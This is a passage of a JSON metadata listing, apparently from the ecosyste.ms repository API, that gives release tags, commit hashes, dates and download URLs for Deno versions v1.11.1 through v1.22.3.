repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021